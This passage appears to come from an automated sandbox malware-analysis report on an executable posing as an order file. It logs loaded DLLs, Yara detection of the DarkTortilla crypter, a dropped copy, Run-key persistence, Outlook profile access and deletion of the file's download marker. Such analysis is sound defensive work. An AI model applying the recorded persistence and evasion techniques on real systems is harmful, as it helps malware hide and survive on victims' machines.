                    Source: C:\Users\user\Desktop\Orden#46789_2024_Optoflux_mexico_sderls.exeSection loaded: rasapi32.dllJump to behavior
                    Source: C:\Users\user\Desktop\Orden#46789_2024_Optoflux_mexico_sderls.exeSection loaded: rasman.dllJump to behavior
                    Source: C:\Users\user\Desktop\Orden#46789_2024_Optoflux_mexico_sderls.exeSection loaded: rtutils.dllJump to behavior
                    Source: C:\Users\user\Desktop\Orden#46789_2024_Optoflux_mexico_sderls.exeSection loaded: mswsock.dllJump to behavior
                    Source: C:\Users\user\Desktop\Orden#46789_2024_Optoflux_mexico_sderls.exeSection loaded: winhttp.dllJump to behavior
                    Source: C:\Users\user\Desktop\Orden#46789_2024_Optoflux_mexico_sderls.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                    Source: C:\Users\user\Desktop\Orden#46789_2024_Optoflux_mexico_sderls.exeSection loaded: iphlpapi.dllJump to behavior
                    Source: C:\Users\user\Desktop\Orden#46789_2024_Optoflux_mexico_sderls.exeSection loaded: dhcpcsvc6.dllJump to behavior
                    Source: C:\Users\user\Desktop\Orden#46789_2024_Optoflux_mexico_sderls.exeSection loaded: dhcpcsvc.dllJump to behavior
                    Source: C:\Users\user\Desktop\Orden#46789_2024_Optoflux_mexico_sderls.exeSection loaded: dnsapi.dllJump to behavior
                    Source: C:\Users\user\Desktop\Orden#46789_2024_Optoflux_mexico_sderls.exeSection loaded: winnsi.dllJump to behavior
                    Source: C:\Users\user\Desktop\Orden#46789_2024_Optoflux_mexico_sderls.exeSection loaded: rasadhlp.dllJump to behavior
                    Source: C:\Users\user\Desktop\Orden#46789_2024_Optoflux_mexico_sderls.exeSection loaded: fwpuclnt.dllJump to behavior
                    Source: C:\Users\user\Desktop\Orden#46789_2024_Optoflux_mexico_sderls.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Users\user\Desktop\Orden#46789_2024_Optoflux_mexico_sderls.exeSection loaded: userenv.dllJump to behavior
                    Source: C:\Users\user\Desktop\Orden#46789_2024_Optoflux_mexico_sderls.exeSection loaded: msasn1.dllJump to behavior
                    Source: C:\Users\user\Desktop\Orden#46789_2024_Optoflux_mexico_sderls.exeSection loaded: gpapi.dllJump to behavior
                    Source: C:\Users\user\Desktop\Orden#46789_2024_Optoflux_mexico_sderls.exeSection loaded: dwrite.dllJump to behavior
                    Source: C:\Users\user\Desktop\Orden#46789_2024_Optoflux_mexico_sderls.exeSection loaded: windowscodecs.dllJump to behavior
                    Source: C:\Windows\SysWOW64\PING.EXESection loaded: iphlpapi.dllJump to behavior
                    Source: C:\Windows\SysWOW64\PING.EXESection loaded: winnsi.dllJump to behavior
                    Source: C:\Windows\SysWOW64\PING.EXESection loaded: mswsock.dllJump to behavior
                    Source: C:\Windows\SysWOW64\cmd.exeSection loaded: ntmarta.dllJump to behavior
                    Source: C:\Windows\SysWOW64\PING.EXESection loaded: iphlpapi.dllJump to behavior
                    Source: C:\Windows\SysWOW64\PING.EXESection loaded: winnsi.dllJump to behavior
                    Source: C:\Windows\SysWOW64\PING.EXESection loaded: mswsock.dllJump to behavior
                    Source: C:\Windows\SysWOW64\PING.EXESection loaded: iphlpapi.dllJump to behavior
                    Source: C:\Windows\SysWOW64\PING.EXESection loaded: winnsi.dllJump to behavior
                    Source: C:\Windows\SysWOW64\PING.EXESection loaded: mswsock.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\vexplorerez.exeSection loaded: mscoree.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\vexplorerez.exeSection loaded: apphelp.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\vexplorerez.exeSection loaded: kernel.appcore.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\vexplorerez.exeSection loaded: version.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\vexplorerez.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\vexplorerez.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\vexplorerez.exeSection loaded: uxtheme.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\vexplorerez.exeSection loaded: windows.storage.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\vexplorerez.exeSection loaded: wldp.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\vexplorerez.exeSection loaded: profapi.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\vexplorerez.exeSection loaded: cryptsp.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\vexplorerez.exeSection loaded: rsaenh.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\vexplorerez.exeSection loaded: cryptbase.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\vexplorerez.exeSection loaded: rasapi32.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\vexplorerez.exeSection loaded: rasman.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\vexplorerez.exeSection loaded: rtutils.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\vexplorerez.exeSection loaded: mswsock.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\vexplorerez.exeSection loaded: winhttp.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\vexplorerez.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\vexplorerez.exeSection loaded: iphlpapi.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\vexplorerez.exeSection loaded: dhcpcsvc6.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\vexplorerez.exeSection loaded: dhcpcsvc.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\vexplorerez.exeSection loaded: dnsapi.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\vexplorerez.exeSection loaded: winnsi.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\vexplorerez.exeSection loaded: rasadhlp.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\vexplorerez.exeSection loaded: fwpuclnt.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\vexplorerez.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\vexplorerez.exeSection loaded: userenv.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\vexplorerez.exeSection loaded: msasn1.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\vexplorerez.exeSection loaded: gpapi.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\vexplorerez.exeSection loaded: dwrite.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\vexplorerez.exeSection loaded: windowscodecs.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\vexplorerez.exeSection loaded: propsys.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\vexplorerez.exeSection loaded: edputil.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\vexplorerez.exeSection loaded: urlmon.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\vexplorerez.exeSection loaded: iertutil.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\vexplorerez.exeSection loaded: srvcli.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\vexplorerez.exeSection loaded: netutils.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\vexplorerez.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\vexplorerez.exeSection loaded: wintypes.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\vexplorerez.exeSection loaded: policymanager.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\vexplorerez.exeSection loaded: msvcp110_win.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\vexplorerez.exeSection loaded: sspicli.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\vexplorerez.exeSection loaded: appresolver.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\vexplorerez.exeSection loaded: bcp47langs.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\vexplorerez.exeSection loaded: slc.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\vexplorerez.exeSection loaded: sppc.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\vexplorerez.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\vexplorerez.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\vexplorerez.exeSection loaded: mscoree.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\vexplorerez.exeSection loaded: kernel.appcore.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\vexplorerez.exeSection loaded: version.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\vexplorerez.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\vexplorerez.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\vexplorerez.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\vexplorerez.exeSection loaded: uxtheme.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\vexplorerez.exeSection loaded: windows.storage.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\vexplorerez.exeSection loaded: wldp.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\vexplorerez.exeSection loaded: profapi.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\vexplorerez.exeSection loaded: cryptsp.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\vexplorerez.exeSection loaded: rsaenh.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\vexplorerez.exeSection loaded: cryptbase.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\vexplorerez.exeSection loaded: rasapi32.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\vexplorerez.exeSection loaded: rasman.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\vexplorerez.exeSection loaded: rtutils.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\vexplorerez.exeSection loaded: mswsock.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\vexplorerez.exeSection loaded: winhttp.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\vexplorerez.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\vexplorerez.exeSection loaded: iphlpapi.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\vexplorerez.exeSection loaded: dhcpcsvc6.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\vexplorerez.exeSection loaded: dhcpcsvc.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\vexplorerez.exeSection loaded: dnsapi.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\vexplorerez.exeSection loaded: winnsi.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\vexplorerez.exeSection loaded: rasadhlp.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\vexplorerez.exeSection loaded: fwpuclnt.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\vexplorerez.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\vexplorerez.exeSection loaded: userenv.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\vexplorerez.exeSection loaded: msasn1.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\vexplorerez.exeSection loaded: gpapi.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\vexplorerez.exeSection loaded: dwrite.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\vexplorerez.exeSection loaded: windowscodecs.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\vexplorerez.exeSection loaded: propsys.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\vexplorerez.exeSection loaded: edputil.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\vexplorerez.exeSection loaded: urlmon.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\vexplorerez.exeSection loaded: iertutil.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\vexplorerez.exeSection loaded: srvcli.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\vexplorerez.exeSection loaded: netutils.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\vexplorerez.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\vexplorerez.exeSection loaded: wintypes.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\vexplorerez.exeSection loaded: policymanager.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\vexplorerez.exeSection loaded: msvcp110_win.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\vexplorerez.exeSection loaded: sspicli.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\vexplorerez.exeSection loaded: appresolver.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\vexplorerez.exeSection loaded: bcp47langs.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\vexplorerez.exeSection loaded: slc.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\vexplorerez.exeSection loaded: sppc.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\vexplorerez.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\vexplorerez.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\vexplorerez.exeSection loaded: textshaping.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\vexplorerez.exeSection loaded: textinputframework.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\vexplorerez.exeSection loaded: coreuicomponents.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\vexplorerez.exeSection loaded: coremessaging.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\vexplorerez.exeSection loaded: ntmarta.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\vexplorerez.exeSection loaded: coremessaging.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: mscoree.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: kernel.appcore.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: version.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: vcruntime140_clr0400.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: ucrtbase_clr0400.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: ucrtbase_clr0400.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: uxtheme.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: windows.storage.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: wldp.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: profapi.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: cryptsp.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: rsaenh.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: cryptbase.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: wbemcomn.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: amsi.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: userenv.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: sspicli.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: rasapi32.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: rasman.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: rtutils.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: mswsock.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: winhttp.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: ondemandconnroutehelper.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: iphlpapi.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: dhcpcsvc6.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: dhcpcsvc.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: dnsapi.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: winnsi.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: rasadhlp.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: fwpuclnt.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: vaultcli.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: wintypes.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: secur32.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: schannel.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: mskeyprotect.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: ntasn1.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: ncrypt.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: ncryptsslp.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: msasn1.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: dpapi.dll
                    Source: C:\Users\user\Desktop\Orden#46789_2024_Optoflux_mexico_sderls.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0EE7644B-1BAD-48B1-9889-0281C206EB85}\InprocServer32Jump to behavior
                    Source: Window RecorderWindow detected: More than 3 window changes detected
                    Source: C:\Users\user\Desktop\Orden#46789_2024_Optoflux_mexico_sderls.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\11.0\Outlook\Profiles
                    Source: Orden#46789_2024_Optoflux_mexico_sderls.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
                    Source: Orden#46789_2024_Optoflux_mexico_sderls.exeStatic PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                    Source: Binary string: oC:\Windows\dll\System.pdb]gQZ source: vexplorerez.exe, 00000011.00000002.4069562420.0000000005F39000.00000004.00000020.00020000.00000000.sdmp
                    Source: Binary string: HP`oLC:\Windows\Microsoft.VisualBasic.pdb source: vexplorerez.exe, 00000011.00000002.4034368741.0000000000737000.00000004.00000010.00020000.00000000.sdmp
                    Source: Binary string: System.pdbN|2h|2 Z|2_CorDllMainmscoree.dll source: vexplorerez.exe, 00000011.00000002.4034654888.0000000000ABB000.00000004.00000020.00020000.00000000.sdmp
                    Source: Binary string: "7f11d50a3a\Microsoft.VisualBasic.pdbh source: vexplorerez.exe, 00000011.00000002.4069562420.0000000005F53000.00000004.00000020.00020000.00000000.sdmp
                    Source: Binary string: System.pdb source: vexplorerez.exe, 00000011.00000002.4034654888.0000000000ABB000.00000004.00000020.00020000.00000000.sdmp
                    Source: Binary string: f:\binaries\Intermediate\vb\microsoft.visualbasic.build.vbproj_731629843\objr\x86\Microsoft.VisualBasic.pdb source: vexplorerez.exe, 00000011.00000002.4034654888.0000000000A7C000.00000004.00000020.00020000.00000000.sdmp, vexplorerez.exe, 00000011.00000002.4034654888.0000000000ABB000.00000004.00000020.00020000.00000000.sdmp

                    Data Obfuscation

                    barindex
                    Yara detected DarkTortilla Crypter
                    Source: Yara matchFile source: 0.2.Orden#46789_2024_Optoflux_mexico_sderls.exe.b10000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.Orden#46789_2024_Optoflux_mexico_sderls.exe.3a63300.3.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 16.2.vexplorerez.exe.46aceaa.5.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.Orden#46789_2024_Optoflux_mexico_sderls.exe.b10000.0.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.Orden#46789_2024_Optoflux_mexico_sderls.exe.3a63300.3.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 16.2.vexplorerez.exe.4734a0a.4.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.Orden#46789_2024_Optoflux_mexico_sderls.exe.3bbb87a.6.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.Orden#46789_2024_Optoflux_mexico_sderls.exe.3c433da.5.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 17.2.vexplorerez.exe.3d7cc32.2.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.Orden#46789_2024_Optoflux_mexico_sderls.exe.3a00802.1.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 17.2.vexplorerez.exe.3e04792.3.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.Orden#46789_2024_Optoflux_mexico_sderls.exe.39bca32.4.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 00000010.00000002.3865481800.00000000044F0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000010.00000002.3865481800.0000000004534000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000000.00000002.2980414937.00000000028AF000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000010.00000002.3848959756.000000000339F000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000011.00000002.4064362259.0000000003BC0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000000.00000002.2980414937.0000000002983000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000011.00000002.4064362259.0000000003D22000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000010.00000002.3865481800.0000000004734000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000000.00000002.2980414937.0000000002C00000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000011.00000002.4064362259.0000000003C04000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000010.00000002.3865481800.0000000004652000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000000.00000002.2983258832.0000000003B60000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000000.00000002.2979580611.0000000000B10000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000011.00000002.4064362259.0000000003E04000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000011.00000002.4037955042.0000000002A6F000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000000.00000002.2983258832.0000000003C43000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000000.00000002.2983258832.0000000003969000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: Process Memory Space: Orden#46789_2024_Optoflux_mexico_sderls.exe PID: 6524, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: vexplorerez.exe PID: 4000, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: vexplorerez.exe PID: 7124, type: MEMORYSTR
                    Source: C:\Users\user\Desktop\Orden#46789_2024_Optoflux_mexico_sderls.exeCode function: 0_2_05166DC0 pushad ; retf 0078h0_2_05166DC1
                    Source: C:\Users\user\Desktop\Orden#46789_2024_Optoflux_mexico_sderls.exeCode function: 0_2_079AD5A8 push es; ret 0_2_079AD5E2
                    Source: C:\Users\user\Desktop\Orden#46789_2024_Optoflux_mexico_sderls.exeCode function: 0_2_08109EA8 pushfd ; iretd 0_2_08109EB5
                    Source: C:\Users\user\Desktop\Orden#46789_2024_Optoflux_mexico_sderls.exeCode function: 0_2_0812038F push FFFFFF8Bh; iretd 0_2_08120349
                    Source: C:\Users\user\AppData\Roaming\vexplorerez.exeCode function: 16_2_0184E1B0 push esp; ret 16_2_0184E2CD
                    Source: C:\Users\user\AppData\Roaming\vexplorerez.exeCode function: 16_2_0184E720 pushad ; ret 16_2_0184E8D5
                    Source: C:\Users\user\AppData\Roaming\vexplorerez.exeCode function: 16_2_0184AD7A push 8B000005h; retf 16_2_0184AD7F
                    Source: C:\Users\user\AppData\Roaming\vexplorerez.exeCode function: 16_2_06DAB298 push es; ret 16_2_06DAB2B0
                    Source: C:\Users\user\AppData\Roaming\vexplorerez.exeCode function: 16_2_08514DF0 push edx; ret 16_2_08516096
                    Source: C:\Users\user\AppData\Roaming\vexplorerez.exeCode function: 16_2_08514DF0 pushad ; ret 16_2_085160C5
                    Source: C:\Users\user\AppData\Roaming\vexplorerez.exeCode function: 16_2_085160FD pushad ; ret 16_2_085160C5
                    Source: C:\Users\user\AppData\Roaming\vexplorerez.exeCode function: 16_2_08516097 pushad ; ret 16_2_085160C5
                    Source: C:\Users\user\AppData\Roaming\vexplorerez.exeCode function: 16_2_08515F1C push edx; ret 16_2_08516096
                    Source: C:\Users\user\AppData\Roaming\vexplorerez.exeCode function: 16_2_08809EA8 pushfd ; iretd 16_2_08809EB5
                    Source: C:\Users\user\AppData\Roaming\vexplorerez.exeCode function: 17_2_00CFF5ED push esp; iretd 17_2_00CFF5EE
                    Source: C:\Users\user\AppData\Roaming\vexplorerez.exeCode function: 17_2_00CFF626 pushfd ; iretd 17_2_00CFF627
                    Source: C:\Users\user\AppData\Roaming\vexplorerez.exeCode function: 17_2_078047C3 push FFFFFFE9h; ret 17_2_078047C7
                    Source: C:\Users\user\AppData\Roaming\vexplorerez.exeCode function: 17_2_078046C5 push FFFFFFE9h; retn 0001h17_2_078046C8
                    Source: C:\Users\user\AppData\Roaming\vexplorerez.exeCode function: 17_2_07A64DF0 push edx; ret 17_2_07A66096
                    Source: C:\Users\user\AppData\Roaming\vexplorerez.exeCode function: 17_2_07A64DF0 pushad ; ret 17_2_07A660C5
                    Source: C:\Users\user\AppData\Roaming\vexplorerez.exeCode function: 17_2_07A65F1C push edx; ret 17_2_07A66096
                    Source: C:\Users\user\AppData\Roaming\vexplorerez.exeCode function: 17_2_07A66097 pushad ; ret 17_2_07A660C5
                    Source: C:\Users\user\AppData\Roaming\vexplorerez.exeCode function: 17_2_07A660FD pushad ; ret 17_2_07A660C5
                    Source: C:\Users\user\AppData\Roaming\vexplorerez.exeCode function: 17_2_07CD9EA8 pushfd ; iretd 17_2_07CD9EB5
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 26_2_00BAE875 pushad ; ret 26_2_00BAE895
                    Source: Orden#46789_2024_Optoflux_mexico_sderls.exeStatic PE information: section name: .text entropy: 7.074848234336099
                    Source: Orden#46789_2024_Optoflux_mexico_sderls.exe, b1K.csHigh entropy of concatenated method names: 'o8', 'MoveNext', 'Hw', 'SetStateMachine', 'd9T', 'e7Q', 'Sm0', 'Qo6', 'r9H', 'Xx5'
                    Source: C:\Windows\SysWOW64\cmd.exeFile created: C:\Users\user\AppData\Roaming\vexplorerez.exeJump to dropped file
                    Source: C:\Windows\SysWOW64\reg.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run vexplorerezzJump to behavior
                    Source: C:\Windows\SysWOW64\reg.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run vexplorerezzJump to behavior

                    Hooking and other Techniques for Hiding and Protection

                    barindex
                    Hides that the sample has been downloaded from the Internet (zone.identifier)
                    Source: C:\Users\user\Desktop\Orden#46789_2024_Optoflux_mexico_sderls.exeFile opened: C:\Users\user\Desktop\Orden#46789_2024_Optoflux_mexico_sderls.exe\:Zone.Identifier read attributes | deleteJump to behavior
